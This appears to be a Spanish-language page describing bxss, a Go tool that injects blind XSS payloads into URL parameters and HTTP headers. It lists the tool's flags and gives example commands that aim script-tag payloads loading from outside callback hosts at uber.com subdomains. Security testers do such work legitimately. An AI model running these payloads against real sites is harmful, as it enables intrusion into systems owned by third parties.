Bxss es una herramienta de inyección Blind XSS (Blind XSS Injector) realmente rápido y fácil de configurar, escrito en Go.
Una herramienta Blind XSS Injector

Tabla de Contenido
Características
- Inyecta cargas útiles Blind XSS en cabeceras personalizadas
- Inyecta cargas útiles Blind XSS en los parámetros
- Utiliza diferentes métodos de solicitud (PUT, POST, GET, OPTIONS) todos a la vez
- Encadenamiento de herramientas (Tool Chaining)
- Muy rápido.
- Fácil de configurar
Instalar
$ go get -u github.com/ethicalhackingplayground/bxss
Argumentos
____
| _ \
| |_) |_ _____ ___
| _ <\ \/ / __/ __|
| |_) |> <\__ \__ \
|____//_/\_\___/___/
-- Coded by @z0idsec --
-appendMode
Append the payload to the parameter
-concurrency int
Set the concurrency (default 30)
-header string
Set the custom header (default "User-Agent")
-parameters
Test the parameters for blind xss
-payload string
the blind XSS payload
Blind XSS en parámetros
$ subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters
Blind XSS en X-Forwarded-For (XFF) Header
$ subfinder uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"
Dark Mode